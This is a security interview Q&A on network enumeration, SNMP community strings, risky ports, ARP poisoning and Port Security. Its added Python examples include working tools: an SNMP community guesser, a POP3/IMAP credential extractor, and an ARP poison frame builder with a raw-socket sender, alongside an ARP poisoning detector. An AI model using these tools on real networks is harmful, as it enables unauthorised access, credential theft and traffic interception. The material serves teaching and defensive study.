Security Interview Q&A

Q: How does a firewall (both host-based and network) affect the time required to run tools that perform network enumeration?
A: When a firewall is configured to reject unauthorized packets, it answers with a TCP RST or an ICMP unreachable message, so the scanning host learns immediately that the port is closed (or administratively blocked). When a firewall silently drops the packet instead, the scanner gets no answer at all and must wait for its timeout, usually retransmitting several times, before it can conclude that the connection will not succeed (Nmap reports such ports as filtered rather than closed). On many operating systems and in many tools, the number of retries and the length of the timeout can be configured. The longer the timeout and the higher the retry count, the longer it takes to decide whether each service is responding, and a drop policy multiplies that wait across every filtered port in the scan.
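The difference the answer describes is easy to see with a connect() probe that distinguishes a refused connection from a silent timeout and records how long each verdict took. The following is an added example, not code from the original Q&A; the loopback listener and the TEST-NET address 192.0.2.1 used in the demo are assumed stand-ins for a real target, and the timeout and retry counts are arbitrary defaults.

```python
"""Added example, not from the original Q&A: a TCP connect() probe that
reports open / closed / filtered and how long each verdict took.  A firewall
that rejects (TCP RST or ICMP unreachable) makes 'closed' instant; one that
drops forces the probe to burn timeout * retries before it can say
'filtered'."""
import errno
import socket
import time


def probe_port(host, port, timeout=1.0, retries=2):
    """Return (verdict, elapsed_seconds).  verdict is 'open', 'closed',
    'filtered' or 'unreachable'.  timeout and retries are the tunables the
    answer refers to: worst case is about timeout * retries."""
    start = time.monotonic()
    verdict = "filtered"                  # nothing ever answered
    for _ in range(retries):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            verdict = "open"              # SYN/ACK came back
            break
        except socket.timeout:
            continue                      # dropped: silence, try again
        except OSError as exc:
            if exc.errno == errno.ECONNREFUSED:
                verdict = "closed"        # RST (or ICMP port unreachable)
            elif exc.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
                verdict = "unreachable"   # ICMP unreachable / no route
            break
        finally:
            s.close()
    return verdict, time.monotonic() - start


def worst_case_seconds(timeout, retries, ports):
    """Upper bound on scan time when every port is silently dropped."""
    return timeout * retries * ports


def local_listener():
    """Open a listening socket on an ephemeral loopback port (demo helper)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv


def unused_port():
    """Find a loopback port that nothing is listening on (demo helper)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv = local_listener()
    # open: the listener completes the handshake immediately
    print("listener", probe_port("127.0.0.1", srv.getsockname()[1]))
    srv.close()
    # closed: the kernel answers with RST, so this is also immediate
    print("closed", probe_port("127.0.0.1", unused_port()))
    # 192.0.2.1 (TEST-NET, assumed to go nowhere): expect 'filtered' or
    # 'unreachable' only after roughly timeout * retries
    print("blackhole", probe_port("192.0.2.1", 80, timeout=2.0, retries=2))
    print("1000 dropped ports, 2 s timeout, 3 retries:",
          worst_case_seconds(2.0, 3, 1000), "s")
```

Run against a host behind a reject rule and the closed verdicts arrive in milliseconds; behind a drop rule every one of them costs the full timeout times retries, which is why scanners such as Nmap expose those two knobs.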

Q: What are the common SNMP community strings? What other strings might you try?
A: public and private are the two most common community strings (they are case-sensitive, so try both lower- and upper-case forms). Next try the company's name, then the corporate initials. Then take the corporate initials and add RO (read-only) and RW (read-write) to the front and to the back. A string that is accepted for a GET is worth testing with a SET as well, because a read-write community lets you change the device's configuration, not just read it.
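The following is an added example, not code from the original Q&A: it turns a company name into the candidate list the answer describes (extended to the full name as well as the initials, with case variants), hand-encodes an SNMPv1 GetRequest for sysDescr.0 in BER so no third-party library is needed, and checks whether a reply is a GetResponse with error-status 0, which is how an agent signals that it accepted the community. "Acme Widgets" and the target address in the demo are made-up inputs.

```python
"""Added example, not from the original Q&A: SNMP community guessing with a
hand-rolled SNMPv1 GetRequest (BER encoding done inline)."""
import socket

SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # sysDescr.0


def candidate_communities(company):
    """public/private, company name, initials, and RO/RW prefixed or suffixed
    to the initials (and, going beyond the answer, to the name).  Community
    strings are case-sensitive, so lower, upper and as-typed variants are all
    emitted, de-duplicated in order."""
    words = company.split()
    name = "".join(words)
    initials = "".join(w[0] for w in words)
    raw = ["public", "private", name, initials]
    for base in (initials, name):
        for tag in ("ro", "rw"):
            raw += [tag + base, base + tag]
    seen, out = set(), []
    for cand in raw:
        for variant in (cand.lower(), cand.upper(), cand):
            if variant not in seen:
                seen.add(variant)
                out.append(variant)
    return out


def _ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _ber_int(value):
    size = (value.bit_length() + 8) // 8          # leaves room for the sign bit
    return _tlv(0x02, value.to_bytes(size, "big", signed=True))


def _ber_oid(arcs):
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:                                # base-128, high bit = more
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(0x06, bytes(out))


def snmp_get_request(community, oid=SYS_DESCR_0, request_id=1):
    """SNMPv1 Message ::= SEQUENCE { version 0, community, GetRequest-PDU }."""
    varbind = _tlv(0x30, _ber_oid(oid) + b"\x05\x00")          # OID + NULL
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0)
               + _tlv(0x30, varbind))                            # GetRequest
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def community_accepted(reply):
    """True if reply is a GetResponse (0xA2) with error-status 0.  Agents
    normally stay silent on a bad community, so a timeout is the usual 'no'."""
    try:
        tag, msg, _ = _read_tlv(reply)
        if tag != 0x30:
            return False
        _, _, p = _read_tlv(msg)            # version
        _, _, p = _read_tlv(msg, p)         # community (echoed back)
        tag, pdu, _ = _read_tlv(msg, p)
        if tag != 0xA2:
            return False
        _, _, p = _read_tlv(pdu)            # request-id
        _, status, _ = _read_tlv(pdu, p)    # error-status
        return int.from_bytes(status, "big", signed=True) == 0
    except (IndexError, ValueError):
        return False


def probe_community(target, community, timeout=1.0):
    """Send one GetRequest to UDP/161 and report whether it was accepted."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(snmp_get_request(community), (target, 161))
        data, _ = s.recvfrom(4096)
        return community_accepted(data)
    except socket.timeout:
        return False
    finally:
        s.close()


if __name__ == "__main__":
    cands = candidate_communities("Acme Widgets")   # made-up company
    print(len(cands), "candidates, e.g.", cands[:8])
    print("GET sysDescr.0 with 'public':", snmp_get_request("public").hex())
    # for c in cands: print(c, probe_community("192.0.2.10", c))  # made-up target
```

The same candidates should also be tried against SNMPv2c (the message is identical apart from version 1 instead of 0) and, once a read-only string is found, against a SetRequest to learn whether it is in fact read-write.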

Q: For the following ports, what is the common service and why should you care about this?
1433

A: Microsoft SQL Server listens on TCP 1433. A number of worms have used MS-SQL as their attack vector, and many MS-SQL installations have configuration weaknesses such as weak or blank "sa" passwords. A database server should never be reachable directly from the external, untrusted network.
110

A: POP3 runs on 110. It is an unencrypted protocol for downloading e-mail, and the client sends its credentials in clear text with the USER and PASS commands (IMAP on 143 does the same with LOGIN) unless the session is wrapped in TLS (POP3S on 995, IMAPS on 993, or STARTTLS). On many systems the e-mail password is the same as the account sign-on password, so when you are network sniffing, both POP3 and IMAP are prime protocols to watch for to learn username/password pairs.

6667

A: Internet Relay Chat (IRC). Many botnets have used IRC as their command-and-control channel, so all outbound connections to IRC should be blocked by default. If a business need exists, open connections only to the individual IRC servers that are known to be safe, and treat any other outbound 6667 traffic as a sign of a compromised host.
5631

A: Symantec pcAnywhere, which many organizations use for remote administration (TCP 5631 carries the session; UDP 5632 is its status port). Many pcAnywhere installations are not configured with strong authentication, and most are not configured for encrypted connections, allowing easy sniffing of all activity in the session.
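The clear-text credential exposure described for port 110 above is what a sniffer actually looks for. The following is an added example, not code from the original Q&A: it extracts username/password pairs from the client side of a POP3 or IMAP session (USER/PASS, LOGIN, and, going beyond the answer, SASL PLAIN, which both protocols support and which is only base64, not encryption). The three session payloads are constructed samples, not captured traffic.

```python
"""Added example, not from the original Q&A: pull credentials out of
clear-text POP3 (110) and IMAP (143) client streams."""
import base64
import re

# Constructed samples: the client-to-server half of three sessions, as a
# sniffer would reassemble them.  Server replies are omitted.
POP3_CLIENT = b"USER alice\r\nPASS s3cret!\r\nSTAT\r\nQUIT\r\n"
IMAP_CLIENT = b'a001 LOGIN "bob" "hunter2"\r\na002 SELECT INBOX\r\na003 LOGOUT\r\n'
IMAP_PLAIN = (b"a001 AUTHENTICATE PLAIN\r\n"
              + base64.b64encode(b"\0carol\0pa55word") + b"\r\n")


def _sasl_plain(blob):
    """Decode a SASL PLAIN blob: [authzid] NUL authcid NUL password."""
    try:
        parts = base64.b64decode(blob, validate=True).split(b"\0")
    except ValueError:            # binascii.Error is a ValueError
        return None
    if len(parts) != 3:
        return None
    return parts[1].decode("utf-8", "replace"), parts[2].decode("utf-8", "replace")


def extract_credentials(payload, port):
    """Return [(user, password), ...] found in one client stream.  port 110
    is parsed as POP3, 143 as IMAP; both branches also recognise PLAIN."""
    lines = payload.decode("latin-1").split("\r\n")
    creds, user = [], None
    for i, line in enumerate(lines):
        if port == 110:
            m = re.match(r"USER\s+(\S+)", line, re.I)
            if m:
                user = m.group(1)
                continue
            m = re.match(r"PASS\s+(.*)", line, re.I)
            if m and user is not None:
                creds.append((user, m.group(1)))
                user = None
                continue
        elif port == 143:
            m = re.match(r'\S+\s+LOGIN\s+"?([^"\s]+)"?\s+"?([^"]*)"?\s*$', line, re.I)
            if m:
                creds.append((m.group(1), m.group(2)))
                continue
        # POP3 'AUTH PLAIN' or IMAP 'tag AUTHENTICATE PLAIN'; the base64 blob
        # is either on the same line (initial response) or on the next one.
        m = re.match(r"(?:\S+\s+)?AUTH(?:ENTICATE)?\s+PLAIN(?:\s+(\S+))?\s*$",
                     line, re.I)
        if m:
            blob = m.group(1) or (lines[i + 1] if i + 1 < len(lines) else "")
            decoded = _sasl_plain(blob)
            if decoded:
                creds.append(decoded)
    return creds


def sniff_all():
    """Run the extractor over the constructed samples (demo entry point)."""
    return {
        "pop3": extract_credentials(POP3_CLIENT, 110),
        "imap-login": extract_credentials(IMAP_CLIENT, 143),
        "imap-plain": extract_credentials(IMAP_PLAIN, 143),
    }


if __name__ == "__main__":
    for proto, pairs in sniff_all().items():
        print(proto, pairs)
```

Feed it the reassembled client stream of any session on 110 or 143 that is not wrapped in TLS and it recovers the pairs the answer warns about; on 995 and 993, or after STARTTLS, the same bytes are ciphertext and nothing matches.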

Q: When doing a security evaluation, how many automated tools should you use and why?
A: You should use at least one tool, and preferably two or more. Using an automated tool makes the work consistent and repeatable. No one tool does it all: each has its own probe set and signatures, so using more than one reduces false negatives (what one tool misses, another may find), and a finding reported by several tools is more credible than one reported by a single tool, which helps you weed out false positives.

Q: BiDiBLAH uses Google to gather information. Why use Google?
A: Many companies do not understand how completely Google caches the Internet. Combine Google with the Wayback Machine (www.archive.org/web/web.php) and you can learn a lot about a company. By searching for e-mail addresses you learn who the key individuals are and, possibly, which sub-domains exist. By searching Internet newsgroups you may be able to determine what language and IDE the target uses to develop its primary application. Sometimes Google will even turn up code snippets from the application.

Q: How does ARP poisoning work?
A: On a local network, systems do not deliver packets by IP address; each frame is addressed to a MAC address. When systemA is about to start a new connection to systemB, it must find systemB's MAC address, so it broadcasts an ARP request to the network that asks, "Who has IP address B?" Normally, a correctly configured machine answers only for its own IP address. In ARP poisoning, your machine (systemH) answers such requests claiming that it is systemB, and it usually also sends unsolicited ARP replies, broadcast to the whole segment and repeated constantly, asserting your MAC address for every IP address you want to intercept. Most systems accept these replies without having asked and overwrite their ARP cache with your MAC for those IPs, so their traffic for systemB (or for the default gateway) is sent to you instead. To stay unnoticed you forward that traffic on to its real destination; otherwise the poisoned hosts simply lose connectivity.

Q: How accurate is banner grabbing for enumerating what application and version is running on a remote system?
A: You cannot rely on banner grabbing. Most applications can be configured to lie in their banner (the banner is just text the administrator controls), and most can be run on ports other than their default. Treat a banner as a hint and confirm it with behavioral fingerprinting, such as sending protocol-specific probes and comparing the responses (nmap -sV does this).

Q: Why will Port Security not stop ARP poisoning?
A: Port Security only limits (or pins) the MAC addresses allowed on a port. When ARP poisoning, you are not sending multiple MAC addresses; you are sending one MAC address, your own, and associating it with multiple IP addresses. If the switch can limit and validate the IP addresses bound to each port, the scope of ARP poisoning is severely reduced; on managed switches that is the job of Dynamic ARP Inspection, which checks each ARP packet against the IP-to-MAC bindings learned by DHCP snooping and drops those that do not match.
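The two ARP answers above (how the poison is built, and why counting MAC addresses per port does not catch it) can be seen side by side in one script. The following is an added example, not code from the original Q&A: it builds the unsolicited ARP reply frame a poisoner sends, parses ARP frames back, and watches a stream of replies for the two symptoms Port Security misses: an IP whose MAC suddenly changes, and one MAC claiming more IPs than a host legitimately should (the per-port IP limit the last answer wishes for, applied in software). All MAC and IP addresses are made up, and the raw-socket sender is shown but not used by the demo.

```python
"""Added example, not from the original Q&A: ARP poison frame builder plus a
cache-poisoning detector.  Addresses below are invented."""
import socket
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"   # systemH (made up)
VICTIM_MAC = "00:50:56:00:00:0b"     # systemB (made up)
GATEWAY_MAC = "00:50:56:00:00:01"    # default gateway (made up)


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def arp_frame(sender_mac, sender_ip, target_mac, target_ip, reply=True):
    """Ethernet II + ARP (RFC 826), padded to the 60-byte minimum.  A reply
    whose sender_ip is the victim's and sender_mac the attacker's is the
    poison: 'victim_ip is at attacker_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2 if reply else 1)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp + b"\x00" * (60 - len(eth) - len(arp))


def parse_arp(frame):
    """Return the ARP fields as a dict, or None if the frame is not IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    f = frame[22:42]
    return {"op": op, "sender_mac": fmt_mac(f[0:6]), "sender_ip": fmt_ip(f[6:10]),
            "target_mac": fmt_mac(f[10:16]), "target_ip": fmt_ip(f[16:20])}


def poison_frames(attacker_mac, victim_ips):
    """Unsolicited broadcast replies, one per IP the attacker wants to own."""
    return [arp_frame(attacker_mac, ip, BROADCAST, ip) for ip in victim_ips]


def send_frame(iface, frame):
    """Put a raw frame on the wire (Linux AF_PACKET, needs CAP_NET_RAW).
    Not called by the demo."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    s.bind((iface, 0))
    s.send(frame)
    s.close()


class ArpWatch:
    """Learns IP->MAC and MAC->IPs from ARP replies and reports the two
    signs of poisoning that a MAC-count limit never sees."""

    def __init__(self, max_ips_per_mac=1):
        self.ip_to_mac, self.mac_to_ips = {}, {}
        self.max_ips = max_ips_per_mac

    def observe(self, frame):
        a = parse_arp(frame)
        if not a or a["op"] != 2:
            return []
        alerts = []
        old = self.ip_to_mac.get(a["sender_ip"])
        if old and old != a["sender_mac"]:
            alerts.append(f"{a['sender_ip']} moved from {old} to {a['sender_mac']}")
        self.ip_to_mac[a["sender_ip"]] = a["sender_mac"]
        ips = self.mac_to_ips.setdefault(a["sender_mac"], set())
        ips.add(a["sender_ip"])
        if len(ips) > self.max_ips:
            alerts.append(f"{a['sender_mac']} claims {len(ips)} IPs: {sorted(ips)}")
        return alerts


def run_scenario():
    """Two legitimate replies, then the attacker claims gateway and victim."""
    watch = ArpWatch(max_ips_per_mac=1)
    frames = [arp_frame(GATEWAY_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.2"),
              arp_frame(VICTIM_MAC, "10.0.0.2", GATEWAY_MAC, "10.0.0.1")]
    frames += poison_frames(ATTACKER_MAC, ["10.0.0.1", "10.0.0.2"])
    alerts = []
    for frame in frames:
        alerts += watch.observe(frame)
    return alerts


if __name__ == "__main__":
    for alert in run_scenario():
        print("ALERT:", alert)
```

Every frame in the scenario carries exactly one source MAC per sending host, so Port Security with a limit of one MAC per port passes all of them; the detector catches the poison only because it tracks IP-to-MAC bindings, which is what Dynamic ARP Inspection does in hardware.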